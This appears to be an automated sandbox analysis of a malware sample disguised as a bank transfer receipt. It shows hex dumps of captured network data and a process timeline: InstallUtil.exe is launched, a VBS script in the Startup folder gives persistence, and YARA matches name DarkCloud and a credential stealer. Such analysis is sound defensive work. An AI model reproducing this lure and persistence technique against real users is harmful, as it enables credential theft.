                                      2025-02-19 07:57:10 UTC8000INData Raw: 95 5d c4 da a2 ca 3c b1 99 8f c6 0f 06 e0 54 4a 7c 8d 98 d4 92 d5 af 5f ad d4 82 24 18 0a ed 0c f2 ff 4c 33 d5 39 b5 0c b2 b5 93 5d 4b 48 01 1b a2 11 c7 29 1f 9f 48 2a 80 2d f3 f7 2e d2 e1 74 c9 9b 62 54 cf 5b e0 73 34 af 54 9b 12 0a 07 32 86 e0 0a ac dc 81 04 19 54 64 9c 63 26 9a 37 46 b1 c2 98 74 27 eb ae 00 8c a2 bf a7 19 da 74 72 2f 7e 73 fc 0d 15 f5 28 7f 2a 88 ec 14 8a 4f ab ba 57 2b c2 6b 4a b3 e4 5c 89 a2 d1 df 6f 5e 75 b0 8b 70 9a 83 c6 d9 3b 70 3a 97 1c 9c 71 af d0 2d b5 a8 6a c1 81 e3 27 42 1f 24 c0 a3 a7 12 74 00 8b dd 52 36 1b 44 ed 3b 61 44 11 6e 62 d6 07 49 74 1f 4f b7 e8 85 62 f8 19 f6 09 15 66 dd 4b f4 bf 61 94 98 a6 6f 78 1b d8 df 89 4c 5f 19 0c 38 6b 49 7b 8f 41 6c bc 5c 37 05 0b 85 35 7d a5 73 c4 99 58 a2 e3 61 d2 2e 47 d6 db 25 bf 8f
                                      Data Ascii: ]<TJ|_$L39]KH)H*-.tbT[s4T2Tdc&7Ft'tr/~s(*OW+kJ\o^up;p:q-j'B$tR6D;aDnbItObfKaoxL_8kI{Al\75}sXa.G%
                                      2025-02-19 07:57:10 UTC8000INData Raw: c8 16 81 e5 8a a9 b8 6c aa 01 5d a0 90 0f b4 0f 99 a6 10 8d 6e 3c b9 2a a3 67 da be f2 0b f0 a8 35 4e bc 5d 64 d5 3c 1d a8 1d 0e b5 cc cf 4b 99 78 0d 0b 99 bd 3a 40 cf 74 9c 33 be 31 69 ae 77 0b a2 43 97 d3 ef 64 3a 6e c7 ff 3f 04 18 ea d9 17 65 46 bb cb ed f1 5a 15 a7 75 91 6e 52 32 33 6e d2 21 f1 59 6d 18 62 5d 15 c8 1c a5 47 74 65 e8 b5 b4 90 f8 e6 43 58 e5 3a 50 df 55 f9 f4 11 74 55 a7 dc 48 d3 7e 90 d5 6c 9a 66 46 00 76 c0 62 4f 9f b5 47 e8 a4 97 d2 47 81 70 4d 1d e5 46 70 82 fd f4 61 fb 87 e7 c3 0c a8 0e 5b c7 e2 5e e4 e3 36 44 0d 9d 1a 20 66 5c 96 38 1a 31 68 f2 d8 bb f1 e1 d6 0b a5 76 6a 18 14 85 6c 06 9f 39 2a 34 c4 2f df 0e 9a d1 95 3b bc fd 01 a8 7d 1c 4b 70 ef a7 63 99 bb 3c a8 69 ce 97 a8 33 ac 3f 64 2b 51 7e b7 7e 95 8d 58 03 a2 bf e1 7b 55
                                      Data Ascii: l]n<*g5N]d<Kx:@t31iwCd:n?eFZunR23n!Ymb]GteCX:PUtUH~lfFvbOGGpMFpa[^6D f\81hvjl9*4/;}Kpc<i3?d+Q~~X{U
                                      2025-02-19 07:57:10 UTC8000INData Raw: 70 31 11 96 3c a4 ee 64 ed 43 86 09 da 5e 2a c2 73 0e 0d 35 17 93 3e ea 40 ed 36 84 76 aa 25 06 15 51 8a 2b d2 65 8c 7b 16 fb 3a 42 02 5b b7 16 76 4e c1 ac c2 f8 98 fc 4e d8 d5 a3 03 44 c2 9a 1f 83 40 5c 68 ce e5 60 d7 8d 4c d2 d1 12 98 c6 fc 7c b0 29 c2 d9 18 59 23 6c 89 94 57 57 cc b6 ab 30 7a de 8a 62 f6 71 8b 89 8f fc b9 70 87 0d a4 6c e5 05 ac 58 18 74 43 e2 30 16 34 1e 19 3e 98 23 c6 ae ed 14 fa b9 3a 65 2f 2b b4 d3 77 69 0b 8b 73 ac 26 0f b1 95 f1 f7 eb 7f a4 42 be d8 b6 26 53 09 e4 a4 64 06 46 cd 48 7a 53 fc 24 75 bf 76 c9 c0 06 de 34 5f ba 5f b5 57 9a 13 fe 28 17 aa 8d e4 57 fa 16 32 26 d0 f6 4d 4a d5 2a 39 34 98 d7 6e 9e 53 92 1d 51 b3 0c 51 24 5c e3 30 58 12 c5 a6 60 e8 29 88 cc ae d1 24 e8 fb 82 28 04 58 d4 c5 6b 4f 0d a4 e5 62 4c 6d 36 ea 45
                                      Data Ascii: p1<dC^*s5>@6v%Q+e{:B[vNND@\h`L|)Y#lWW0zbqplXtC04>#:e/+wis&B&SdFHzS$uv4__W(W2&MJ*94nSQQ$\0X`)$(XkObLm6E
                                      2025-02-19 07:57:10 UTC8000INData Raw: 36 f0 c2 45 4e 02 00 36 7c f1 ce f2 85 1a e2 7b f3 bb 75 38 5e d8 f1 ae 8d 8f 8f a7 8e 50 7c 08 b4 f2 84 f5 27 2c 36 68 3e a1 28 cd 6b 32 6e 68 74 a0 4d 72 03 ca 10 65 1f 43 6a 23 89 51 b8 f3 7d b9 b8 32 2f 56 dd 36 45 20 9d 5a 90 79 90 77 54 01 bb 48 89 88 7f 43 a0 fa 59 91 8d 6f fe 78 27 18 16 d2 47 0d f5 73 7b 31 48 eb 30 77 50 fe 90 ab f1 9d b8 58 0d 00 74 fd 04 31 a3 8e 63 02 92 af bc 62 5a 86 f8 12 4d 9c 41 2d 46 58 fb 39 55 0b ff 5a f8 ed fe c2 fd c2 0d 7f 1d 89 08 72 ce 8a 84 c4 8a ae 17 4c 7b 1e 7a af f4 00 e9 e2 8f 93 43 34 11 1e b8 3d 1e c8 31 e9 e3 93 f4 2f 64 31 11 8d 20 5f c6 e3 b9 03 0a cc f0 0e a9 b8 5b 30 75 ec 65 74 e0 de c1 e2 6c 04 5d 07 79 0a b7 18 6a 4f 18 f1 16 31 99 6d 10 11 09 b1 6b a1 82 ef 24 46 b9 4d 77 ca d7 c1 58 0a bb 95 72
                                      Data Ascii: 6EN6|{u8^P|',6h>(k2nhtMreCj#Q}2/V6E ZywTHCYox'Gs{1H0wPXt1cbZMA-FX9UZrL{zC4=1/d1 _[0uetl]yjO1mk$FMwXr
                                      2025-02-19 07:57:10 UTC8000INData Raw: 6a 5d fc 6c d7 a7 fd de 6e 4c 38 e7 62 70 2d 87 67 d2 44 e6 9e f7 09 95 3c 60 ed e0 d1 83 13 43 87 77 1d e5 df 74 83 2a e5 b4 93 ec 39 f1 76 51 b3 db 31 a1 76 29 65 ca 22 a9 f2 25 72 f8 78 db 51 9f e6 b9 9f 77 db 60 bd a1 3d 93 4c cd d3 0a 8b d1 75 ca ad 82 d7 ff 95 e4 7e 78 a2 6a 32 8a 39 8f c5 f7 d9 0d 7d c5 d8 82 5e 54 5d bd 32 2a 32 26 cd ef d8 12 47 17 5e 31 d6 85 e8 41 65 74 4c 54 b0 dd 31 d0 45 e0 22 48 94 70 a4 cd e4 e6 8c 30 ae 23 10 64 4c 12 2d 57 7f 80 65 4d 02 73 ea 94 34 95 84 0c de c6 76 37 00 77 14 fb 11 92 55 d4 84 d6 fb df c0 58 96 5c a6 d0 49 10 d6 89 62 43 05 21 a0 ec 94 f1 8c 2f 73 3f 6a f4 16 b8 a5 f0 8d 10 ef de 2a 49 74 d9 3a 68 69 87 cb cf 0d 26 f0 00 ea b9 ee ce ec 7b ee fa d7 c5 b0 bf 80 7e ec 50 5a dd 24 0c e6 c8 9a 28 f9 0e 44
                                      Data Ascii: j]lnL8bp-gD<`Cwt*9vQ1v)e"%rxQw`=Lu~xj29}^T]2*2&G^1AetLT1E"Hp0#dL-WeMs4v7wUX\IbC!/s?j*It:hi&{~PZ$(D
                                      2025-02-19 07:57:10 UTC8000INData Raw: d1 17 5e aa cf 98 56 bf 2c b0 26 80 29 a4 07 af 6c c9 ee c2 d1 e4 63 9d cd d1 4b e5 5e 06 24 c8 50 7b ed a2 d1 96 e0 1b 22 ae c0 ee 68 d8 8f e4 81 75 8d cc 3a ff df 3a 78 cb 9f 46 7b ec 6d 53 da 24 1f 9b e3 74 2c 0b 17 fb 76 2f 85 7b 4d ed 95 ac 9e 8b 30 49 14 1e 29 aa 73 53 4f 6c 53 12 7a da 7c 2b 77 6f eb fd a9 e8 07 60 d8 77 37 f7 8a f2 13 67 20 88 4e 34 a3 7a 71 49 68 ae b3 3f 16 f3 82 59 ce f9 35 fe f6 8c d0 63 0b c9 75 79 08 fe 64 30 d2 56 2c 07 47 82 83 b7 62 ab 1a 98 8e ed da 50 86 69 6f 0c d3 6c 14 3c 85 bd e1 3a 5c 0d 3b 7f a0 1c 2a e6 49 1c 0c ba 35 3f 1c 50 c8 0a 3c fc 21 20 a5 4d c6 07 fe d5 34 98 9a 12 12 ce 0b 7c 40 b9 41 96 46 2c 99 15 f4 12 bf 22 18 cd 7c 51 87 4a d9 5c 7f d3 4d 4b 7f f5 8c 8f 10 bd 05 03 02 6c b8 7e 1b 6c 72 52 a8 ee ab
                                      Data Ascii: ^V,&)lcK^$P{"hu::xF{mS$t,v/{M0I)sSOlSz|+wo`w7g N4zqIh?Y5cuyd0V,GbPiol<:\;*I5?P<! M4|@AF,"|QJ\MKl~lrR
                                      2025-02-19 07:57:10 UTC8000INData Raw: 1f e2 3d 00 2b cf 68 05 89 3a 40 dc e2 ed 43 57 91 44 75 74 b9 75 42 03 70 ea 9e ac 61 c7 2e bd 33 57 0c 56 6f 44 08 25 1a 18 66 43 5f 43 6a 98 b2 dc 51 e4 bd b4 5a e4 1e 0c 3d ea 47 b9 30 50 f7 39 ec a7 c4 d2 fd 16 c2 47 6b b5 f7 aa 32 d0 56 97 c2 78 af 46 31 18 76 2c 05 51 13 6c a5 67 28 9d a4 c8 44 ed f4 16 89 b1 16 9c fe 93 e9 10 66 23 1c 58 74 17 b3 ee 3b a5 55 73 91 66 e0 12 9f 8a da 5a 9c 32 b5 07 e3 e5 1d 59 88 97 e2 ad 1a 2e 40 e6 ab c0 19 86 1a 0b 0b 6e d8 02 36 72 18 42 7c 6c ec 00 09 7c 45 5f 8c a0 b0 56 92 73 74 c0 1f e6 f7 86 b8 d7 4e dc 92 cf a0 2a 02 34 84 2f b9 94 16 fb 64 20 f3 49 59 0a aa b7 22 40 60 1f 39 4c fa 8a 22 a3 af 76 a1 6d 67 da 7b 7f 6f 8d 31 9e a8 53 61 8a 81 0d b4 5e af 8d e1 72 0c da 00 1b b9 6f 61 ae f0 00 71 9c e9 a0 1d
                                      Data Ascii: =+h:@CWDutuBpa.3WVoD%fC_CjQZ=G0P9Gk2VxF1v,Qlg(Df#Xt;UsfZ2Y.@n6rB|l|E_VstN*4/d IY"@`9L"vmg{o1Sa^roaq
                                      2025-02-19 07:57:10 UTC8000INData Raw: 71 16 22 9d c9 dc 7b ef d4 c6 3a 9b 31 4f b5 7c 4f 1a 55 b5 3d 5c 7f 14 53 df ee 7e 5e b3 31 9c 9a f3 e9 24 e8 c4 86 ca 1f 67 47 f6 ef c0 03 22 24 11 77 84 0b 5f 01 a7 f3 8d 37 a8 5a e4 8b c0 60 6c 69 47 4f 68 d8 d6 a7 97 5e 1a 7f 68 1c 97 50 dc 63 38 fb 5c f4 d5 ee 6a 5e 1a 9c 6f cc 76 7f b7 89 dc 4d f6 42 6e 1a 67 03 7c 10 b9 fb 80 11 87 70 e0 7a a8 7f bc 28 f0 c2 c8 8c fe c1 0c f2 48 85 2a a1 ad 72 33 24 16 5c 12 37 94 94 07 c6 54 78 57 e6 4d df 68 96 22 70 9e e6 c4 3d 79 8c 65 55 fc 4d de 47 47 02 45 85 d6 6b bc 69 40 e9 62 16 f6 f6 a2 3f b3 af 00 1f 1d a1 b6 c8 3f c9 68 fe bb 2e c9 4a a4 4d 72 4d 6d c4 0f 59 0b 48 0f fe e2 aa c4 b2 34 3e 16 26 b5 fb c0 58 a1 0c 09 63 99 f3 37 58 5d 85 99 27 a5 9d 85 75 30 07 74 4c 11 b9 6a 3a 82 d9 be 13 29 fb c7 58
                                      Data Ascii: q"{:1O|OU=\S~^1$gG"$w_7Z`liGOh^hPc8\j^ovMBng|pz(H*r3$\7TxWMh"p=yeUMGGEki@b??h.JMrMmYH4>&Xc7X]'u0tLj:)X
                                      2025-02-19 07:57:10 UTC8000INData Raw: f7 fc bc cd dd 7f 67 83 7e 73 0c 06 1a dd 44 8e df f7 2f c1 a2 c1 29 90 8d ed 6d 74 27 a3 c4 ce ee d2 d6 8a 55 d1 28 d7 62 0e 6b f3 62 ef ab 68 8c ab 38 43 d1 4d fd c9 f8 d1 30 54 62 aa 7e bb 5d c7 17 08 97 6f d0 c0 84 03 13 9e 14 76 28 64 4d c3 24 a3 7a 0f 06 15 85 30 33 70 d4 d8 11 7d 69 57 ff ee 06 f1 7f 78 04 bd 0a f8 4e a2 9e 63 ba ca 4e 91 60 03 4c 4f e6 a4 ab 3f 19 d0 1d 32 b6 dc 25 d3 e6 bd 6a 89 2b 4b 78 ca 94 d6 db 34 98 26 d0 1a 80 01 dc 31 ab d4 1e 7b 17 dc 2f d3 3f a8 0c 90 93 59 ae 22 ba 1c a3 91 a3 c8 fb 1a 7c 88 ef 10 b3 98 2a 3e 83 f3 a0 f6 db 2f 58 00 c6 ec 20 9c c5 eb f9 10 c4 15 6f 15 11 4b 48 d0 08 a5 2e 3c 8f ea 00 f8 57 05 78 44 21 8c 75 d3 ea 0e da 1a 99 d2 13 79 9c 88 d1 39 5c 09 b4 4a d8 64 42 2d ff 0a b9 d6 09 83 b3 c3 a8 bf 87
                                      Data Ascii: g~sD/)mt'U(bkbh8CM0Tb~]ov(dM$z03p}iWxNcN`LO?2%j+Kx4&1{/?Y"|*>/X oKH.<WxD!uy9\JdB-


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:02:56:54
                                      Start date:19/02/2025
                                      Path:C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe"
                                      Imagebase:0x280000
                                      File size:2'084'352 bytes
                                      MD5 hash:365DBE320E1CAD52761BE88C423D63B3
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2118219479.0000000006700000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:02:56:57
                                      Start date:19/02/2025
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      Imagebase:0x550000
                                      File size:42'064 bytes
                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:3
                                      Start time:02:56:58
                                      Start date:19/02/2025
                                      Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0xd60000
                                      File size:418'304 bytes
                                      MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:02:57:07
                                      Start date:19/02/2025
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs"
                                      Imagebase:0x7ff6c4010000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:02:57:08
                                      Start date:19/02/2025
                                      Path:C:\Users\user\AppData\Roaming\IsClosed.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\IsClosed.exe"
                                      Imagebase:0x370000
                                      File size:2'084'352 bytes
                                      MD5 hash:365DBE320E1CAD52761BE88C423D63B3
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 35%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:02:57:11
                                      Start date:19/02/2025
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      Imagebase:0x380000
                                      File size:42'064 bytes
                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Disassembly

                                      Reset < >